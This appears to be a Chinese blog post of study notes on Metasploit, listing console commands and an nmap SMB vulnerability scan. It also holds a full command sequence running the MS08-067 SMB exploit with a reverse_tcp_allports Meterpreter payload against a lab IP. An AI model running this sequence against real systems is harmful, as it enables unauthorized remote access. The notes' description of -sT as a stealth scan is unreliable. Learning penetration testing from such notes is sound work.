metasploit 读书笔记-EXPLOITATION
一、渗透攻击基础
1.常用命令
show exploits 显示Meta框架中所有可用的渗透攻击模块。
show options 显示模块所需要的各种参数
back 返回Meta的上一个状态
search 查找模块
use 使用模块
show payloads 输入此命令时,Meta只会将与当前模块兼容的攻击载荷显示出来;
set payload 选择需要的payload
show targets 列出受到漏洞影响目标系统的类型
注意:Auto Targeting 攻击模块通过目标系统的指纹信息,自动选择操作系统版本进行攻击。但是,在做攻击时最好是通过人工确认目标系统的系统类型等相关信息,准确的制定攻击,避免发生错误的、破坏性的攻击。
set 与unset :设置某个参数与禁用相关参数
set TARGET 可以设置目标系统类型
setg 与 unsetg 对全局参数进行设置和清除
save 将当前设置保存下来
二、攻击实例
nmap -sT -A --script=smb-check-vulns -P0 192.168.3.13
注意参数:-sT 是隐秘的TCP连接扫描(Stealth TCP connect),这个参数进行端口枚举是最可靠的。
-sS 隐秘的TCP Syn扫描
-A 高级操作系统探测功能(advanced OS detection)
2、全端口攻击payloads:暴力猜解目标开放的端口
对所有可用的端口进行尝试
use windows/smb/ms08_067_netapi
set LHOST 192.168.33.129
set RHOST 192.168.33.130
set TARGET 3
search ports
set PAYLOAD windows/meterpreter/reverse_tcp_allports
exploit -j
3、资源文件Resource files
MSF终端内包含一系列自动化命令的脚本文件。
最新文章
- C#的扩展方法解析
- js截取url的参数(转自。。)
- 【Python】调用WPS V9 API,实现PPT转PDF
- 使用plupload做一个类似qq邮箱附件上传的效果
- 黑马程序员——JAVA基础之正则表达式,网络爬虫
- Correspondence / ˏkɔris'pɔndәns / dictionary10-800.doc
- PHP读写XML文件的四种方法
- 开发报表时将已有User做成下拉列表,第一项为label为ALL,value为null
- readonly 关键字的用法
- PID控制器的数字实现及C语法讲解
- Unity给力插件之Final IK
- 【JAVA - SSM】之MyBatis插入数据后获取自增主键
- 【转】 java中HashMap详解
- 64位系统/32位系统下/8位CPU的数据宽度
- 用Maven创建web项目
- [转载]Oracle创建用户、角色、授权、建表
- 跳过复制错误——sql_slave_skip_counter
- Oracle PLSQL Demo - 16.弱类型REF游标[没有指定查询类型,已指定返回类型]
- 不能用Xming连接到 Centos 7
- 一个简单的C#+arcgis的非数据库版例子